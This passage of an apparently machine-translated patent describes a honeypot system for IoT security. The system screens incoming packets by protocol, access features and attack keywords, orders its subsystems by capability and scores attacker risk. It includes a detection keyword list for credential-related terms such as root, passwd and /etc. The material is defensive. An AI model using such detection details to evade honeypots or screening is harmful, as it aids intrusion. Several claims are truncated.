and if the protocol for analyzing the data packet is a preset protocol in the screening rule and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule, determining that the analyzed data packet is the suspicious analyzed data packet.

The preset protocol may be set as required, for example, the preset protocol includes but is not limited to: protocols tcp, ssh, sip, http, mqtt, soap, etc.

The access characteristics may include, among other things, the geographic location and host address of the end (host) of the visitor's use, access duration, number of accesses, port(s) of the attempted connection (of the inducement server), and the like, as related to the visitor's access to the inducement server. For each access characteristic, a specific access characteristic corresponding to the suspicious user may be set, for example, the suspicious user is a user with access times not lower than 100, and the like.

Wherein, the order of the data screening and logic detection steps is not limited.

Optionally, in this embodiment, the filtering rules may include filtering rules set from a keyword dimension, where the keyword is understood as a keyword that may occur in the attack data packet, and the keyword may be set manually. After the suspicious analysis data packet is determined, more accurate matching can be performed based on the screening rule, and the steps of performing attack feature matching on the suspicious analysis data packet based on attack feature information of an attack data packet preset in the screening rule, and determining an attack data packet in an access data packet based on a matching result may include:

performing keyword matching on the suspicious analysis data packet based on the attack data packet keywords preset in the screening rule;

determining the successfully matched suspicious analysis data packet as a high suspicious analysis data packet;

The attack packet keywords may be keywords with a high occurrence frequency statistically counted from historical attack packets, or may be keywords related to sensitive operations such as user permission or protocol modification, and optionally, the keywords include but are not limited to: root, passwd, password, su, sudo, admin,/etc. If a keyword is detected in the payload of the analysis packet, the packet will be a highly suspicious analysis packet.

Optionally, the screening rules may further include screening rules set from the network attack dimension, and the screening rules of this kind include attack features related to network attacks,

optionally, the network attack includes, but is not limited to, a vulnerability attack, an attack against an internet of things protocol, and an attack performed by using some general network attack methods, and correspondingly, the screening rule may include a vulnerability characteristic of a preset vulnerability, an attack characteristic against an internet of things protocol, an attack characteristic of a preset attack network method, and the like.

Optionally, the step of determining an attack packet in the access packet based on the high suspicious analysis packet may include:

if the effective load of the highly suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rule; or the associated content associated with the internet of things protocol in the high suspicious analysis data packet has the attack characteristics set in the screening rule aiming at the internet of things protocol; or, the data of the high suspicious analysis data packet has the attack characteristics of the preset attack network method set in the screening rule;

The preset vulnerability can be any existing vulnerability, and the internet of things protocol includes but is not limited to related protocols such as MQTT and SOAP.

In this embodiment, for the attack guidance subsystem having the real device (i.e., the entity client device), a filtering rule based on a detection dimension of a specific operation page of the real device may be further set, and in this type of filtering rule, specific operation page data of the real device included in the attack data packet may be set. The specific operation page is not limited in type and specific content, and may be, for example, a management page, a user page, a data download page, and the like of the real device. The specific operation page is a user operation page that is not exposed when the entity client device in this embodiment is exposed in the public network. For example, when the entity client device is exposed in the public network, only the data of the login page is exposed, the user can access the login page only through the public network access attack induction subsystem, and can enter other operation pages such as a management page after logging in the entity client device through the account information.

If an access packet of a user includes data of any specific operation page and the access packet is sent without logging in the entity client device by the user, the access packet may be determined as an attack packet.

Optionally, this embodiment further includes: if the high suspicious analysis data packet includes information of the entity client device, which is not exposed to the public network, the access data packet corresponding to the high suspicious analysis data packet may also be considered as an attack data packet. Wherein the information not exposed to the public network may include a specific operation page of the entity client device.

In this embodiment, the preset attack network method includes, but is not limited to, a general attack method, such as a web shell attack, an SQL (Structured Query Language) injection attack, and the like.

In another example, the attack inducement capabilities in the attack inducement subsystem are related to the honeypot technology used by the attack inducement subsystem, the type, number, masquerading services, etc. of the inducement client devices that the subsystem comprises. Generally, the more complex the honeypot technology is, the more the number of induced client devices is, the richer the types are, the more disguised services are, the stronger the attack induction capability is. The stronger the challenge induction, the more advanced the screening order.

In this example, the screening orders of the attack guidance subsystems are not completely the same, and may be determined according to the attack guidance capabilities of the network subsystems to the attack data packets, and in one example, the step of determining the screening orders of the attack guidance subsystems based on the attack guidance capabilities of the attack guidance subsystems may be performed when the subsystems of the attack guidance systems change, for example, the disguised service of the subsystems changes, and the client device is induced to change (including deletion, addition, and the like). In the case where the attack-inducing subsystem is not changed, the updating of the screening order may not be performed.

In this embodiment, different types of attack-inducing subsystems are different in time required for deployment or update willingness for deployment, for example, for an attack-inducing subsystem deployed based on a low-interaction honeypot technology, the deployment time is short and can be completed quickly, and the attack-inducing capability can reach a high level by itself quickly.

In this embodiment, the deployment duration of the attack guidance subsystem implemented by the high-interaction honeypot may be set to be longer, some basic server-side devices such as the guidance server and some guidance client-side devices may be deployed first, and then the structure of the attack guidance subsystem is gradually increased to increase the guidance client-side devices, so that the requirement of the complex attack guidance subsystem for high deployment cost in a short time can be reduced. With the perfection of the attack induction subsystem, the attack induction capability of the attack induction subsystem is gradually increased.

In this embodiment, the relative strength of the attack inducing capabilities of the different attack inducing subsystems may be changed, and the attack inducing capabilities are strong, so that the number of attack data packets received by the attack inducing subsystems may be increased, and considering that one attack user may attack a plurality of attack inducing subsystems at the same time, the embodiment may first perform screening of the attack data packets on the attack inducing subsystems with strong attack inducing capabilities, and perform screening of the attack data packets on the attack inducing subsystems that screen the attack data packets later based on the screening result, thereby avoiding that the access data packets of all the attack inducing subsystems need to be matched with the corresponding screening rules, and facilitating reduction of resources required for screening.

The attack inducing capability of the attack inducing subsystem may be determined periodically at time intervals, or when a change (structural change or disguised service change, etc.) in a certain attack inducing subsystem is detected, the attack inducing capability of the attack inducing subsystem may be determined.

After each determination, the determined attack guidance capability can be converted into identification information such as a numerical value which can reflect the strength of the attack guidance capability, and then the old identification information of the attack guidance subsystem is replaced by the newly determined identification information. In the above steps, the identification information of the attack guidance subsystem may be read, and the screening order of the attack data packets of the attack guidance subsystem may be determined according to the identification information. In one example, different attack induction subsystems may share a set of screening rules, or the screening rules of different attack induction subsystems may be different and may be separately stored according to the setting of the user. Optionally, a corresponding relationship between the screening rule of the attack guidance subsystem and the identification information may be established, and the screening order and the screening rule may be determined simultaneously according to the identification information.

Optionally, the attack guidance capability of the attack guidance subsystem may be determined according to the honeypot technology of the user by the attack guidance subsystem, the number of the server guidance devices and the guidance client devices included in the subsystem, and the disguised service, and the like, optionally, different server guidance devices and guidance client devices may set corresponding scores, and the same server guidance device may set different scores according to factors such as the size of the same server guidance device, and for example, for the guidance server, the larger the server is (the more the calculation resources are), the larger the score is. Different honeypot technologies can set corresponding scoring weighted values, then count the sum of the scoring values, perform weighted calculation on the sum of the scoring values by using the scoring weighted values, and obtain the total score as identification information of the attack induction capability of the attack induction subsystem.

Wherein, the more complex the honeypot technology, the higher the scoring value weighting value.

It can be understood that when the attack inducing system is just deployed, the low-interaction honeypot technology is simple, the deployment speed of the low-interaction honeypot technology is high, the number of inducing client devices and the like contained in the attack inducing subsystem deployed based on the technology is probably far greater than that of other attack inducing subsystems, the attack inducing capability of the low-interaction honeypot technology is probably the highest, and as time advances, some attack inducing subsystems are gradually improved, so that the attack inducing capability is stronger and stronger, and gradually exceeds that of the attack inducing subsystem deployed based on the low-interaction honeypot technology.

In an example, the screening rule may also be updated with the update of the attack guidance subsystem, and optionally, the embodiment further includes receiving a screening rule update instruction sent by the target attack guidance subsystem, where the screening rule update instruction includes a newly added screening instruction, resolving the newly added screening rule in the screening rule update instruction, storing the newly added screening rule, and establishing a correspondence between the newly added screening rule and the identification information of the attack guidance capability of the target attack guidance subsystem.

205. If the currently screened attack inducing subsystems are not arranged at the most front positions in the screening sequence, obtaining a sending user of the screened attack data packets based on the screening result of the screened attack inducing subsystems, determining the access data packets sent by the sending user as the attack data packets from the access data packets received by the currently screened attack inducing subsystems, and determining the attack data packets in the unseen access data packets based on the screening rules corresponding to the currently screened attack inducing subsystems and the unseen access data packets of the currently screened attack inducing subsystems;

if the currently screened attack-inducing subsystem is not the first attack-inducing subsystem in the screening order, the determined sending user may be the attack data packets from all the attack-inducing subsystems in the screening order before the currently screened attack-inducing subsystem in the step of determining the sending user of the attack data packet in the screening result based on the screening result of the attack-inducing subsystem in the screening order before the currently screened attack-inducing subsystem.

That is, if there are 3 attack-inducing subsystems, A, B, C for each, A, C, B for the screening sequence, the A is screened according to the corresponding screening rule, after the A is screened, the sending user (for distinguishing, can be called as a first sending user) of the attack data packet of the A is determined according to the screening result, when the access data packet of C is screened, firstly screening the access data packet sent by the first sending user as an attack data packet, then, the rest access data packets are screened according to the corresponding screening rules, the sending users (which can be called as second sending users for distinguishing) of the attack data packets screened from the rest access data packets are determined, when screening the attack data packets, screening the access data packets sent by the first sending user and the second sending user as the attack data packets, and then screening the rest access data packets according to the corresponding screening rules.

Alternatively, in the step of determining the sending user of the attack data packet in the screening result based on the screening result of the attack guidance subsystem before the currently screened attack guidance subsystem in the screening order, the determined sending user may include the sending user of the attack data packet of the attack guidance subsystem with the first screening order.

When the number of the attack inducing subsystems is large, the attack inducing subsystems are sequentially screened according to the screening sequence, the screening time is possibly long, and the characteristic is fully utilized to reduce the screening time and process the attack data packet as soon as possible by considering that the parallel processing capacity of the current cloud server and the like is high, so that a large amount of data can be processed in a short time.

Optionally, in an example, when determining the currently screened attack-inducing subsystems based on the screening order of each attack-inducing subsystem, only two order bits are included in the screening order, the first order bit of the screening order is the one with the strongest attack-inducing capability, and the second order bit of the screening order is the remaining attack-inducing subsystems.

In this example, after the attack data packets are screened out from the access data packets of the attack guidance subsystem with the strongest attack guidance capability, the attack data packets may be simultaneously screened out from the access data packets of the remaining attack guidance subsystems.

In this example, the sequence of the analyzing steps of the access data packets of different attack-inducing subsystems may not be affected by the screening sequence, that is, the access data packets of different attack-inducing subsystems may be analyzed to obtain corresponding analyzed data packets before the attack data packets are screened, and then screening may be performed according to the screening sequence and the screening rule.

In another example, when an attack packet needs to be screened, the corresponding packet may be parsed.

Optionally, the step "determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack inducing subsystem and the access data packet received by the currently screened attack inducing subsystem" may include:

acquiring a corresponding analysis data packet for an access data packet received by a currently screened attack induction subsystem;

For the specific operation steps of analyzing the access data packet, concepts of access behavior characteristic information, attack characteristic information, and the like, and a determination process that the data packet can be analyzed, reference may be made to the relevant description in the foregoing example, which is not described herein again.

Optionally, the step of "obtaining access behavior feature information corresponding to the analysis data packet, and determining a suspicious analysis data packet in the analysis data packet based on the access behavior feature information" may include:

and if the protocol used for analyzing the data packet is a preset protocol in the screening rule corresponding to the currently screened attack inducing subsystem and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule corresponding to the currently screened attack inducing subsystem, determining that the analyzed data packet is the suspicious analyzed data packet.

The relevant explanations of the preset protocol and the specific access characteristics refer to the relevant descriptions in the foregoing examples, and are not described again here.

In one example, the performing feature matching on the suspicious analyzed data packet based on the attack feature information of the attack data packet preset in the screening rule corresponding to the currently screened attack-inducing subsystem, and determining the attack data packet in the access data packet based on the matching result may specifically include: performing keyword matching on the suspicious analysis data packet based on the keywords of the attack data packet preset in the screening rule corresponding to the currently screened attack induction subsystem; determining the suspicious analyzed data packet which is successfully matched as a high suspicious analyzed data packet; and determining an attack data packet in the access data packet based on the high suspicious analysis data packet.

For the explanation of the preset attack packet key, refer to the related description of the foregoing example, which is not described herein again.

if the effective load of the highly suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rule corresponding to the currently screened attack induction subsystem; and/or the associated content associated with the internet of things protocol in the high suspicious analysis data packet has the attack characteristics aiming at the internet of things protocol in the screening rule corresponding to the currently screened attack induction subsystem; and/or the data of the high suspicious analysis data packet has the attack characteristics of the preset attack network method in the screening rule corresponding to the currently screened attack induction subsystem;

determining an access data packet corresponding to the highly suspicious analysis data packet as an attack data packet

For vulnerability characteristics of a preset vulnerability, attack characteristics of an internet of things protocol gateway, attack characteristics of a preset attack network technique, and the like, reference may be made to the related description of the foregoing example, which is not described herein again.

If the currently screened attack induction subsystem is not the first attack induction subsystem in the screening sequence, in the step of determining the attack data packets in the unsensed access data packets based on the screening rule corresponding to the currently screened attack induction subsystem and the unsensed access data packets of the currently screened attack induction subsystem, when the specific screening scheme is the first attack induction subsystem in the screening sequence, the screening scheme of the attack data packets is the same as that of the currently screened attack induction subsystem, only the attack data packets in the screening scheme of the first attack induction subsystem are replaced by the unsensed access data packets of the currently screened attack induction subsystem, the screening rule is the screening rule of the currently screened attack induction subsystem, and other screening steps are consistent, so the details are not repeated.

206. And processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.

In one example, the attack risk of the attack data packet may be determined based on data of a single attack data packet, for example, the attack risk may be determined based on parameters such as a screening rule hit by the attack data packet.

In another example, the determining of the attack risk may be performed on all attack data packets of the same sending user, and optionally, the processing of the attack data packets based on the determined attack risk of the attack data packets on the attack guidance system may include:

determining attack data packets of the same sending user aiming at all attack induction subsystems as user associated attack data packets of the sending user according to the information of the sending user of the attack data packets;

determining the attack risk of the user association attack data packet of the same sending user according to the number of the user association attack data packets of the same sending user, the number and the attack inducing capacity of the attack inducing subsystems attacked by the user association attack data packets and the screening rule hit by the user association attack data packets;

and processing the user-associated attack data packet according to the attack risk of the user-associated attack data packet of the same sending user in a processing mode corresponding to the attack risk.

The number of the user-associated attack packets may be converted into a risk score, and the greater the number, the greater the risk score, each attack induction subsystem may be provided with a corresponding risk score, each screening rule may also be provided with a corresponding risk score, the identification information corresponding to the attack induction capability may be converted into a corresponding risk score, and the attack risk of the user-associated attack packet of the same sending user may be represented by the sum of the risk scores of all the user-associated attack packets of the same sending user.

The risk score threshold may be set, and if the risk score threshold is higher than the risk score threshold, the processing mode of the attack packet is isolated storage, and the attack packet stored in the system where the attack guidance system and the security management device accessing the data are located is deleted, where the storage device used for the isolated storage is a non-networking device.

For attack packets that are not above the risk score threshold, they may be stored in an attack packet database for later use.

Optionally, the embodiment may further perform analysis statistics on the attack data packet, generate a statistical report for a user to view, and the like. Optionally, the method of this embodiment may further include: analyzing data in the data packet based on the attack data packet, and acquiring statistical information of the attack data packet on at least one abnormal traffic statistical dimension; and generating an abnormal flow statistic report based on the statistical information.

The abnormal traffic statistical dimensions include, but are not limited to:

1. an attacker ip;

2. an attacker geographic location;

3. an attack port;

4. the date of the attack;

5. attack times;

6. the protocol used for the attack;

7. attack data payload;

8. describing the vulnerability utilized by the attack;

9. and the vulnerability reference is attacked at this time.

The vulnerability description may include the attack behavior of the attack packet, the generated damage, the server port for the attack packet, and the like. The reference description of the attack vulnerability may include the provenance of the vulnerability, such as the name of the paper, the number of pages, etc.

In one example, after generating the abnormal traffic statistic report based on the statistical information, the method further includes:

and when an abnormal flow checking instruction sent by the management terminal is received, sending an abnormal flow statistical report to the management terminal so that the management terminal can display an abnormal flow checking page based on the abnormal flow statistical report.

Through the abnormal flow checking page, the management user can perform data query and analysis.

By adopting the embodiment, the access data packet received by at least one induction server in the attack induction system is obtained, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server; determining an attack data packet screening scheme of each attack induction subsystem according to the attack induction capability of the attack induction subsystem; determining attack data packets in the access data packets according to the attack data packet screening scheme corresponding to each attack inducing subsystem and the access data packets received by the attack inducing subsystem; based on the determined attack risk of the attack data packet to the attack induction system, the attack data packet is processed, so that different attack induction subsystems can attract more abundant attack behaviors, an induction server in the attack induction system can receive more attack data packets, the attack data packets are detected in a targeted manner through an attack data packet screening scheme corresponding to each attack induction subsystem, a detection result with higher accuracy is obtained, the discovery of more equipment bugs is facilitated, and the safety of the Internet of things industry is improved.

The embodiment also provides an embodiment of a refinement step of a security management method for accessing data, and it is assumed in this example that the attack induction subsystem includes three attack induction subsystems, including an attack induction subsystem a constructed by using a high-interaction honeypot technology, an attack induction subsystem B constructed based on a low-interaction honeypot technology, and a third attack induction subsystem C, where the second and third attack induction subsystems share one induction server.

Referring to fig. 3, the method for managing security of access data includes:

301. sending an access data packet acquisition request to the induction servers of the attack induction subsystems A to C, and receiving an access data packet sent by the induction server in response to the request;

the access data packet obtaining request may carry time information of the last time of obtaining the access data packet, so as to induce the server to send the access data packet received after the time information according to the time information.

302. Acquiring identification information of the attack inducing abilities of the attack inducing subsystems A to C, and determining the screening sequence and the screening rule of the attack inducing subsystems A to C based on the mapping relation between the identification information and the screening sequence and the screening rule;

wherein, the calculation method of the identification information refers to the description of the foregoing examples, which is not described herein again,

in the screening sequence, the attack induction subsystem A is the first in sequence, and the attack induction subsystems B and C are the second in parallel sequence. The screening rule of the attack guidance subsystem a may be the same as or different from the screening rules of the attack guidance subsystems B and C, and this embodiment is not limited thereto.

303. Acquiring a corresponding analysis data packet (for distinguishing, marking as a first analysis data packet) for an access data packet received by an attack induction subsystem A; acquiring a protocol used by the first analysis data packet and acquiring access characteristics of a sending user of the first analysis data packet based on the data of the first analysis data packet;

304. if the protocol of the first analysis data packet is a preset protocol in the screening rule and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule, determining the first analysis data packet as a suspicious analysis data packet;

305. performing keyword matching on the suspicious analysis data packet based on the attack data packet keywords preset in the screening rule; determining the successfully matched suspicious analysis data packet as a high suspicious analysis data packet;

306. if the effective load of the highly suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rule; or the associated content associated with the internet of things protocol in the high suspicious analysis data packet has the attack characteristics set in the screening rule aiming at the internet of things protocol; or, the data of the high suspicious analysis data packet has the attack characteristics of the preset attack network method set in the screening rule; determining an access data packet corresponding to the high suspicious analysis data packet as an attack data packet of an attack inducer system A;

307. determining a sending user of an attack data packet of an attack induction subsystem A;

308. determining the data packets sent by the sending user in the access data packets received by the attack inducement subsystems B and C as attack data packets;

309. obtaining corresponding analysis data packets (for distinguishing, marking as second analysis data packets) for the rest access data packets of the attack induction subsystems B and C; acquiring a protocol used by the second analysis data packet and acquiring access characteristics of a sending user of the second analysis data packet based on the data of the second analysis data packet;

310. if the protocol of the second analysis data packet is a preset protocol in the screening rule and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule, determining the second analysis data packet as a suspicious analysis data packet;

311. performing keyword matching on the suspicious analysis data packet based on the attack data packet keywords preset in the screening rule; determining the successfully matched suspicious analysis data packet as a high suspicious analysis data packet;

312. if the effective load of the highly suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rule; or the associated content associated with the internet of things protocol in the high suspicious analysis data packet has the attack characteristics set in the screening rule aiming at the internet of things protocol; or, the data of the high suspicious analysis data packet has the attack characteristics of the preset attack network technique set in the screening rule; determining access data packets corresponding to the high suspicious analysis data packets as attack data packets of the attack inducement subsystems B and C;

313. determining attack data packets of the same sending user aiming at all attack induction subsystems as user associated attack data packets of the sending user according to the information of the sending user of the attack data packets;

314. the number of the user associated attack data packets can be converted into a first risk score; determining a second risk score of the user association attack data packet according to a risk score corresponding to a preset screening rule and a screening rule hit by the user association attack data packet; obtaining a third risk score according to a preset risk score corresponding to the identification information of each attack induction subsystem and an attack induction subsystem corresponding to the user associated attack data packet; obtaining a fourth risk score according to the corresponding relation between the number of the attack inducing subsystems and the risk score and the number of the attack inducing subsystems corresponding to the user associated attack data packets, and summing the first, second, third and fourth risk scores to obtain the sum of the risk scores of all the user associated attack data packets of the same sending user;

315. and if the sum of the risk scores is higher than the threshold value of the risk scores, carrying out isolated storage on the attack data packet, and deleting the attack data packet stored in the attack inducing system, wherein the storage device used for the isolated storage is a non-networking device.

By adopting the embodiment, more abundant attack behaviors can be attracted by different attack inducing subsystems, so that the inducing server in the attack inducing system can receive more attack data packets, the attack data packets are detected in a targeted manner through the attack data packet screening scheme corresponding to each attack inducing subsystem, a detection result with higher accuracy is obtained, more equipment bugs can be found, and the safety of the Internet of things industry is improved.

In order to solve the above technical problem, this embodiment further provides a security management apparatus for accessing data, and referring to fig. 4, the security management apparatus for accessing data may include:

a data packet obtaining unit 401, configured to obtain an access data packet received by at least one induction server in an attack induction system, where the attack induction system includes at least two attack induction subsystems, and each attack induction subsystem includes an induction server and at least one induction client device connected to the induction server;

a screening scheme determining unit 402, configured to determine a screening order and a screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;

a screening object determining unit 403, configured to determine a currently screened attack inducing subsystem based on a screening order of each attack inducing subsystem;

a first screening unit 404, configured to determine, if the currently screened attack-inducing subsystem is arranged at the most front position in the screening sequence, an attack data packet in the access data packet based on a screening rule corresponding to the currently screened attack-inducing subsystem and the access data packet received by the currently screened attack-inducing subsystem;

a second screening unit 405, configured to, if the currently screened attack inducing subsystem is not arranged at the most front position in the screening sequence, obtain a sending user of a screened attack data packet based on a screening result of the screened attack inducing subsystem, determine, from access data packets received by the currently screened attack inducing subsystem, that an access data packet sent by the sending user is an attack data packet, and determine, based on a screening rule corresponding to the currently screened attack inducing subsystem and an unscreened access data packet of the currently screened attack inducing subsystem, an attack data packet in the unscreened access data packet;

a processing unit 406, configured to process the attack data packet based on the determined attack risk of the attack data packet on the attack guidance system.

before a data packet obtaining unit obtains an access data packet received by at least one induction server in an attack induction system, obtaining a system deployment file of an attack induction subsystem in the attack induction system;

a deployment unit to:

deploying the first induction server in the public network based on a deployment mode of at least one associated attack induction subsystem and a system deployment file;

simulating the induced client equipment which needs to be set in the first attack induction subsystem in the public network according to the deployment mode of the first attack induction subsystem and the system deployment file;

In an optional example, the attack inducement subsystem comprises a third attack inducement subsystem, the deployment unit to:

In an optional example, the first screening unit is configured to:

In an optional example, the screening unit is configured to:

if the payload of the highly suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rule corresponding to the currently screened attack induction subsystem; and/or the associated content associated with the internet of things protocol in the highly suspicious analysis data packet has the attack characteristics aiming at the internet of things protocol in the screening rule corresponding to the currently screened attack induction subsystem; and/or the data of the highly suspicious analysis data packet has the attack characteristics of the preset attack network technique in the screening rule corresponding to the currently screened attack induction subsystem;

In an optional example, the processing unit is to:

in an optional example, further comprising: a statistics unit to:

By adopting the embodiment, the induction servers of different attack induction subsystems can be deployed in the public network, the required induction client devices can be deployed in the public network and the target intranet, and the different attack induction subsystems can attract attack behaviors with more abundant types, so that the induction servers in the attack induction system can receive more attack data packets, and by detecting the attack data packets, more device vulnerabilities can be discovered, thereby being beneficial to improving the safety of the internet of things industry.

In addition, an embodiment of the present invention further provides a computer device, where the computer device may be a terminal or a server, as shown in fig. 5, which shows a schematic structural diagram of the computer device according to the embodiment of the present invention, and specifically:

the computer device may include components such as a processor 501 of one or more processing cores, memory 502 of one or more computer-readable storage media, a power supply 503, and an input unit 504. Those skilled in the art will appreciate that the computer device configuration illustrated in FIG. 5 does not constitute a limitation of computer devices, and may include more or fewer components than those illustrated, or some components may be combined, or a different arrangement of components. Wherein:

the processor 501 is a control center of the computer device, connects various parts of the whole computer device by using various interfaces and lines, runs or executes software programs and/or modules stored in the memory 502, and calls data stored in the memory 502, executes various functions of the computer device and processes the data, thereby monitoring the computer device as a whole. Optionally, processor 501 may include one or more processing cores; preferably, the processor 501 may integrate an application processor, which mainly handles operating systems, user interfaces, application programs, etc., and a modem processor, which mainly handles wireless communications. It will be appreciated that the modem processor may not be integrated into the processor 501.

The memory 502 may be used to store software programs and modules, and the processor 501 executes the software programs and modules stored in the memory 502 to thereby perform various functional applications and data processing. The memory 502 may mainly include a program storage area and a data storage area, wherein the program storage area may store an operating system, an application program required by at least one function (such as a sound playing function, an image playing function, etc.), and the like; the storage data area may store data created according to use of the computer device, and the like. Further, the memory 502 may include high speed random access memory, and may also include non-volatile memory, such as at least one magnetic disk storage device, flash memory device, or other volatile solid state storage device. Accordingly, the memory 502 may also include a memory controller to provide the processor 501 with access to the memory 502.

The computer device further includes a power supply 503 for supplying power to the various components, and preferably, the power supply 503 may be logically connected to the processor 501 via a power management system, such that the power management system performs functions of managing charging, discharging, and power consumption. The power supply 503 may also include any component of one or more dc or ac power sources, recharging systems, power failure detection circuitry, power converters or inverters, power status indicators, and the like.

The computer device may also include an input unit 504, and the input unit 504 may be used to receive input numeric or character information and generate keyboard, mouse, joystick, optical or trackball signal inputs related to user settings and function control.

Although not shown, the computer device may further include a display unit and the like, which are not described in detail herein. Specifically, in this embodiment, the processor 501 in the computer device loads the executable file corresponding to the process of one or more application programs into the memory 502 according to the following instructions, and the processor 501 runs the application programs stored in the memory 502, so as to implement various functions as follows:

if the currently screened attack inducement subsystems are not arranged at the most front positions in the screening sequence, obtaining a sending user of the screened attack data packets based on the screening result of the screened attack inducement subsystems, determining the access data packets sent by the sending user as the attack data packets from the access data packets received by the currently screened attack inducement subsystems, and determining the attack data packets in the non-screened access data packets based on the screening rules corresponding to the currently screened attack inducement subsystems and the non-screened access data packets of the currently screened attack inducement subsystems;

The above operations can be implemented in the foregoing embodiments, and are not described in detail herein.

It will be understood by those skilled in the art that all or part of the steps of the methods of the above embodiments may be implemented by instructions, or the instructions control associated hardware to implement the methods, which may be stored in a computer readable storage medium and loaded and executed by a processor.

To this end, an embodiment of the present invention further provides a storage medium, where multiple instructions are stored, and the instructions can be loaded by a processor to execute the method for security management of access data provided in the embodiment of the present invention.

According to an aspect of the application, there is also provided a computer program product or a computer program comprising computer instructions stored in a computer readable storage medium. The processor of the computer device reads the computer instructions from the computer-readable storage medium, and the processor executes the computer instructions to cause the computer device to perform the method provided in the various alternative implementations in the embodiments described above.

Wherein the storage medium may include: read Only Memory (ROM), Random Access Memory (RAM), magnetic or optical disks, and the like.

Since the instructions stored in the storage medium may execute the steps in the method for securely managing access data provided in the embodiment of the present invention, beneficial effects that can be achieved by the method for securely managing access data provided in the embodiment of the present invention may be achieved, which are detailed in the foregoing embodiments and will not be described herein again.

The security management method, apparatus, computer device and storage medium for accessing data provided by the embodiments of the present invention are described in detail above, and a specific example is applied in the text to explain the principle and the implementation of the present invention, and the description of the above embodiments is only used to help understanding the method and the core idea of the present invention; meanwhile, for those skilled in the art, according to the idea of the present invention, there may be variations in the specific embodiments and the application scope, and in summary, the content of the present specification should not be construed as a limitation to the present invention.

Claims

1. A method for security management of access to data, comprising:

2. The method for security management of access data according to claim 1, wherein before acquiring the access data packet received by at least one induction server in the attack induction system, the method further comprises:

acquiring a system deployment file of an attack inducer subsystem in the attack inducer system;

3. The method for security management of access data according to claim 2, wherein the attack induction subsystem comprises at least two associated attack induction subsystems sharing a first induction server;

the deploying, based on the deployment mode and the system deployment file corresponding to the attack guidance subsystem, a server guidance device of the attack guidance subsystem in a public network and an guidance client device of the attack guidance subsystem in a corresponding client deployment network includes:

4. The method according to claim 3, wherein the associated attack guidance subsystems include first attack guidance subsystems, and the method deploys guidance client devices of the associated attack guidance subsystems in corresponding client deployment networks according to deployment manners of the associated attack guidance subsystems and system deployment files includes:

and simulating, in the public network, a first target protocol required to run the service provided by the inducement client device.

5. The method according to claim 3, wherein the associated attack guidance subsystems include a second attack guidance subsystem, and the deploying guidance client device of each associated attack guidance subsystem in a corresponding client deployment network according to a deployment manner and a system deployment file of each associated attack guidance subsystem includes:

acquiring intranet access information of entity client equipment connected to a target intranet according to a deployment mode of a second attack induction subsystem and a system deployment file;

6. The method according to claim 2, wherein the attack guidance subsystem includes a third attack guidance subsystem, and the deploying, based on a deployment manner and a system deployment file corresponding to the attack guidance subsystem, a server guidance device of the attack guidance subsystem in a public network and an guidance client device of the attack guidance subsystem in a corresponding client deployment network includes:

7. The method for security management of access data according to any one of claims 1 to 6, wherein the determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack-inducing subsystem and the access data packet received by the currently screened attack-inducing subsystem includes:

acquiring a corresponding analysis data packet for the access data packet received by the currently screened attack inducing subsystem;

8. The method for security management of access data according to claim 7, wherein the obtaining access behavior feature information corresponding to the parsing packet, and determining a suspicious parsing packet in the parsing packet based on the access behavior feature information includes:

and if the protocol used for analyzing the data packet is a preset protocol in the screening rule corresponding to the currently screened attack inducing subsystem, and/or the corresponding access characteristic accords with the preset specific access characteristic of the suspicious user in the screening rule corresponding to the currently screened attack inducing subsystem, determining that the analyzed data packet is a suspicious analyzed data packet.

9. The method according to claim 8, wherein the performing feature matching on the suspicious analyzed data packet based on the attack feature information of the attack data packet preset in the screening rule corresponding to the currently-screened attack-inducing subsystem, and determining the attack data packet in the access data packet based on the matching result includes:

10. The method for security management of access data according to claim 9, wherein the determining an attack packet in the access data packet based on the highly suspicious resolved data packet comprises:

if the payload of the highly suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rule corresponding to the currently screened attack induction subsystem; and/or the associated content associated with the internet of things protocol in the high suspicious analysis data packet has the attack characteristics aiming at the internet of things protocol in the screening rule corresponding to the currently screened attack induction subsystem; and/or the data of the highly suspicious analysis data packet has the attack characteristics of the preset attack network method in the screening rule corresponding to the currently screened attack induction subsystem;

11. The method according to any one of claims 1 to 6, wherein the processing the attack data packet based on the determined attack risk of the attack data packet on the attack guidance system comprises:

determining the attack risk of the user-associated attack data packets of the same sending user according to the number of the user-associated attack data packets of the same sending user, the number and the attack inducing capacity of the attack inducing subsystems attacked by the user-associated attack data packets, and the screening rule hit by the user-associated attack data packets;

12. A security management apparatus for accessing data, comprising:

the system comprises a data packet acquisition unit, a data packet acquisition unit and a data packet processing unit, wherein the data packet acquisition unit is used for acquiring an access data packet received by at least one induction server in an attack induction system, the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;

a screening object determination unit for determining the currently screened attack inducing subsystems based on the screening order of each attack inducing subsystem;

13. A computer device, characterized in that the computer device comprises: memory, processor and computer program stored on the memory and executable on the processor, wherein the processor implements the method according to any of claims 1-11 when executing the computer program.

14. A storage medium having stored thereon a computer program for causing a computer to perform the steps of the method according to any of claims 1-11 when the computer program runs on the computer.